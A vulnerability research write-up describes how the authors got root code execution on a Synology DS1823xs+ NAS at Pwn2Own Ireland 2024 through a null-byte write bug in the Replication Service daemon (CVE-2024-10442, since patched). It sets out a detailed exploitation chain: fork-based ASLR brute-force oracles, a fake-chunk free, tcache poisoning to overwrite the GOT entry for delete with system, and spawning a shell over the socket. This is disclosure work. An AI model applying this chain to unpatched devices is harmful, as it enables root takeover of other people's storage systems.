Exploiting the Synology DiskStation with Null-byte Writes
Achieving remote code execution as root on the Synology DS1823xs+ NAS
In October, we attended Pwn2Own Ireland 2024 and successfully exploited the Synology DiskStation DS1823xs+ to obtain remote code execution as root. This issue has been fixed as CVE-2024-10442.
The DiskStation is a popular line of NAS (network-attached storage) products by Synology. It has been succesfully exploited a few times at Pwn2Own events in the past, though it remained untouched in the prior year’s event (Pwn2Own Toronto 2023). Then Ireland 2024 saw three successful entries, all using unique bugs.
This post will detail our experience researching the Synology DiskStation and writing an exploit against it for the event.
Reviewing Synology Packages
As mentioned, the past year or two of Pwn2Own had garnered no entries against the Synology DiskStation. In 2024, ZDI opted to place a few non-default, but first-party packages authored by Synology in-scope for the competition:
For the Synology DiskStation target, the following packages will be installed and are in scope for contest:
- MailPlus
- Drive
- Virtual Machine Manager
- Snapshot Replication
- Surveillance Station
- Photos
“Packages” are optional add-on applications / services (etc.) that can be easily installed on the device via Synology’s Package Center in the DiskStation Manager.
For us, this meant more attack surface, and as this was the first year these packages were in-scope, we figured there was good opportunity to find some relatively shallow vulnerabilities, as these packages likely hadn’t seen as much security-oriented review. This turned out to be very true.
The first package we looked at was Virtual Machine Manager, which we installed directly from the built-in Package Center on a physical DiskStation.
We could then enumerate any new network listeners with netstat
via an SSH shell we had on our test device. This revealed a handful of localhost-only services, save for a single service bound to all interfaces, running the following command (as root):
/var/packages/ReplicationService/target/sbin/synobtrfsreplicad --port 5566
This listener was actually part of Replication Service, a separate package which was a dependency of Virtual Machine Manager (and is also a dependency of Snapshot Replication). Our interest was piqued given the high privilege-level and ease of communication with this service.
The next step was to examine the binary. Since we had installed the service on a real device, we were able to pull the files via SSH.
Alternatively, software downloads are available directly from Synology for both DSM (the core operating system) and packages. An extraction tool can then be used to parse the custom Synology archives and spit out the contents of packages, firmware images, or updates. Note that this particular tool is an FFI wrapper around native first-party Synology shared libraries, which can be pulled off a real device, or extracted from a DSM archive with a separate tool.
Finding the Bug
With the relevant binaries in hand, we can start to look at the code for this TCP service listening on port 5566.
The main binary synobtrfsreplicad
is just a driver shim to invoke functionality in libsynobtrfsreplicacore.so.7
, which starts the TCP listener.
The service is a minimal linux-based forking server, with the main process continually calling accept()
and forking off a child process to handle each new remote client. In turn, the child process runs a basic command loop to parse incoming messages sent to the service.
Each command has a simple binary format, with an opcode optionally followed by a variably-sized data payload:
Two globals are defined to facilitate parsing these command messages. One is for the command itself, and the other is a ring-buffer-esque structure to hold up to 3 variably-sized command payloads.
The command loop for reading messages looks something like this:
If the attacker-supplied length is too large, recvCmd
bails out without reading any payload. However, its return value is zero, indicating no error, a bit odd considering the header length was invalid… Back in the caller, which is unaware of any error, things proceed normally, and the command payload is null terminated, using the arbitrarily large header length.
This bug is trivial enough that for our initial POC, we can use netcat to send a message consisting solely of A’s (at least 12), in classic pwnable fashion:
Unless you’re attached to the service using gdb, there’s no on-device indication that anything has gone wrong. The fault doesn’t seem to be logged to syslog or any other DSM logging facilities, and due to the nature of a forking server, there is no immediate loss of functionality.
The primitive afforded by this vulnerability will allow us to make repeated null byte writes into arbitrary offsets of the shared library’s BSS (data segment). Very CTF-like. Although the vulnerability is rather simple, the exploitation of it will be a bit more interesting.
Regardless, as all mitigations were enabled, we first had to somehow turn this into an info leak.
Forking Server
Before we move on, recall that we’re dealing with a forking server, which can be very useful for breaking ASLR. Each child process that is forked will have the same exact address space as the parent, and crashing them has no consequences: we simply reconnect to the service and get a clean slate, in the form of a new child process. A bit like a time loop, each connection is an opportunity to glean new information about the address space in a cumulative manner.
At a high level, each iteration has the following structure:
- Guess something (e.g. an address)
- Have the binary use the guessed value such that it will behave differently if it’s correct or not (e.g. a wrong address will crash)
- Observe the binary’s behavior to determine if the value was correct
- If correct, we have found the right value. Otherwise, repeat with the next guess
We’ll see how this can be applied to this specific binary as we continue.
Functionality Overview
Since the bug in question occurs during input parsing, we hadn’t yet explored much of the program’s functionality, which we’ll need to leverage in constructing an exploit later on.
After reading the command from the network, the command loop has a switch-case over the supplied opcode. Opcodes that require input parse them from the variable-length command payload. We looked through all the available opcodes to get a rough idea of their functions:
CMD_DSM_VER
: no inputs- returns DSM version numbers
CMD_SSL
: initializes SSL for the connectionCMD_TEST_CONNECT
CMD_NOP
CMD_VERSION
: input integer- sets the “version” of the connection for compatibility differences
CMD_TOKEN
: input string “token” which must exist as a key in a JSON file on disk- performs initialization and sets the global
std::string g_token
- performs initialization and sets the global
CMD_NAME
: input string “name”- can potentially perform btrfs-related operations, and/or use
g_token
to modify the JSON file
- can potentially perform btrfs-related operations, and/or use
CMD_SEND
: input raw data- proxies input to a file descriptor, seemingly setup elsewhere as a pipe to a
btrfs
command
- proxies input to a file descriptor, seemingly setup elsewhere as a pipe to a
CMD_UPDATE
CMD_STOP
: input token string- removes token from JSON
CMD_COUNT
CMD_CLR_BKP
CMD_SYNCSIZE
CMD_END
It soon became clear that many of these code paths hinged on providing a valid “token,” which was supposed to already exist in a JSON file at /usr/syno/etc/synobtrfsreplica/btrfs_snap_replica_recv_token
.
The JSON is used as a simple key-value store of attributes, where the tokens are the keys:
{
"<token>": {"<attribute>":value, ... other attributes ...},
... other tokens ...
}
Presumably, some external service hands out these tokens and writes to the file, but where this happened was unclear to us.
However, there is one code path that allows adding tokens to the JSON file, possibly in an unintended way. The CMD_NAME
opcode uses the current g_token
, and writes an attribute to the file, with two important nuances:
- it does not check if
g_token
was ever initialized (i.e. withCMD_TOKEN
) - if the token did not already exist as a key in the JSON object, setting the attribute adds it
Normally, the uninitialized g_token
will just be an empty string, but with memory corruption in play, all bets are off, and we’ll see how this proves useful later on.
ASLR Oracle #1: Freeing a Fake Heap Chunk
Our primitive is a null byte write, where we supply an arbitrary offset into a command payload buffer. The offset is unsigned, so we can only write nulls to memory following the payload buffer.
This brings the question of what resides after the payload buffer, which will be one of the three 0x10000-sized buffers in the g_recvbuf
global in the shared library’s BSS.
There aren’t many globals except for a handful of std::string
instances, which have the following structure:
The default constructor sets the length to 0, and points the char*
at the inline buffer. In other words, we’ll have a bunch of std::string
instances in the BSS with pointers set to their own BSS address, plus the offset 16.
Now, consider if we use our null write to zero out the two lowest bytes of one of these pointers. The payload buffer that precedes it is 0x10000 bytes, which is large enough to guarantee that the partially-nulled BSS pointer points somewhere within this buffer, although we don’t know the exact offset.
Since ASLR has page granularity (12 bits), there will be 4 bits (one nibble) of entropy in this offset (i.e. it can be 0, 0x1000, 0x2000, … 0xf000).
One of the global strings we can corrupt is _gSnapRecvPath
, which can be re-assigned as one of the operations performed by the CMD_NAME
command.
When re-assigning a std::string
, if the char*
is not pointing at the inline buffer, delete
will be called on the old (now corrupted) value before assigning the new one.
This lets us call free
on a fake chunk within the payload buffer. We naturally control the contents of this buffer with our command payloads.
When free
is invoked, if the fake chunk has a small-enough size, it will be placed into the glibc tcache. Alternatively, if the size is invalid (e.g. zero), free
will call abort
, crashing the process. This creates our first oracle, which we can combine with the forking-server behavior to determine which of the 16 possible offsets (0, 0x1000, … 0xf000) the fake chunk resides at.
For each of the 16 possible offsets:
- Populate the payload buffer with padding up to the guessed offset, followed by the fake chunk’s metadata (which is just a fake size value)
- Trigger the bug twice to null out the two low bytes of the
char*
for_gSnapRecvPath
- Use
CMD_NAME
to free the corruptedchar*
, which may or may not be pointing at the fake chunk placed at the guessed offset- if the socket remains connected and a response is sent, the guessed offset was correct
- if the socket is closed (i.e.
abort
was called), the guess was incorrect; try again with the next offset
We have now resolved one nibble of ASLR entropy and can reliably free a fake chunk in the payload buffer, which will be placed into the tcache.
ASLR Oracle #2: Leaking Tokens
The tcache is a singly-linked list of free chunks, and each free chunk has a next pointer. Due to some hardening attempts in glibc, the next pointer is populated like so:
In our case, the tcache list will previously be empty (next = 0
), so the value written will be &chunk->next >> 12
. In other words, we’ve placed a shifted BSS pointer into the payload buffer. We’ll now want to figure out some way to leak this value.
Once the fake chunk has been freed and the shifted BSS pointer written, we’ll null out the low 2 bytes of the char*
of a second global std::string
, g_token
. This corruption will make g_token
point at the same exact spot as _gSnapRecvPath
. That is, at the shifted BSS pointer.
Recall our earlier functionality discussion of CMD_NAME
, which can add an unintialized g_token
to the JSON file on disk. This is where that fact proves useful, since instead of the “uninitialized” g_token
holding an empty string, it now points at the shifted BSS pointer. Triggering this code path, the JSON file now contains the value we want to leak.
Also note that before writing g_token
out to disk, we can trigger the null byte write an additional time to truncate the shifted BSS pointer. In this way, we can write out each segment of the pointer. For example, if the shifted pointer is 0x766554433
, we can write out each segment from 33
, 3344
, … to the full 3344556607
.
Once the JSON file contains the leak, we can use CMD_TOKEN
as intended, which expects a single string parameter indicating the token to use. This token will be looked up in the JSON file,
and different error codes will be returned based on whether it was found or not. This creates our second oracle, which we can use to implement a byte-by-byte brute force:
- Loop
b
from 0 to 4 for each of the 5 bytes of the shifted BSS pointer:- Truncate the pointer to length
b+1
, then write the truncated segment into the JSON file - Loop over possible bytes
0 - 0xff
:- send
CMD_TOKEN
with the guessed byte (prepended with the bytes already known from previous iterations, of lengthb
) - the returned error code will indicate if the supplied byte was correct
- if correct, we’ve found the byte at index
b
of the shifted pointer - otherwise, keep trying with the next possible byte
- send
- Truncate the pointer to length
Once this byte-by-byte brute force is complete, we’ll have leaked the shifted BSS pointer, which gives us the base address of the shared library.
Since mmap
mappings are contiguous in virtual memory, this also gives us the address of all shared libraries, most notably libc.
Hijacking Control Flow
Armed with a leak, we are ready to craft a final payload to hijack control flow.
We already have the ability to free a fake chunk in the payload buffer, and by sending additional commands, we can arbitrarily corrupt this free chunk. At this point, we can abuse the tcache linked list in the standard way:
- Corrupt the fake chunk’s next pointer with an arbitrary address
- Allocate something of the same size as the fake chunk
malloc
will return the fake chunk, then set the new head of the tcache list to the arbitrary address
- Allocate the same size again to have
malloc
return the arbitrary address
We just have to find some code that matches this pattern of two consecutive allocations.
Luckily, it turns out that the CMD_TOKEN
handler fits this pattern, and after the two allocations are performed, a std::string
temporarily containing our input parameter is destructed, invoking delete
on a char*
with our input.
This brings us to the following strategy:
- Corrupt the fake tcache chunk’s next pointer to point near the shared library’s GOT entry for
delete
- Send a
CMD_TOKEN
command - The handler will allocate twice from the corrupted tcache, overwriting the GOT entry for
delete
withsystem
- The subsequent destructor calls
delete
, which instead invokessystem
with the controlled input string
From here it’s game over. We can simply execute /bin/sh
and redirect stdio to the client socket that’s already connected (avoiding the need for a connect-back).
The full exploit code for our submission has been made available here.
The Fix
The vulnerability was assigned CVE-2024-10442. Synology released a patch relatively quickly for Replication Service on November 5th 2024 (Pwn2Own Ireland took place on October 22nd), which you can find the advisory for here. ZDI’s advisory can be found here.
The patch modified the recvCmd
function to return an error instead of zero if the supplied header length is too large.
The caller then detects this error and bails instead of continuing to process the invalid command.
Conclusion
Although easy to find, this vulnerability was interesting to exploit, in that the null byte write was relatively weak as a primitive. It felt like the sort of bug you’d find in a CTF challenge, and the tcache manipulation and brute force oracles matched the CTF vibe as well.
On a more serious note, even though it’s in a non-default package, the presence of such a simple vulnerability in a remotely accessible service (running as root) is a bit concerning, especially considering that Synology is a fairly popular consumer and business oriented NAS, and it’s not uncommon for these devices to be exposed to the internet.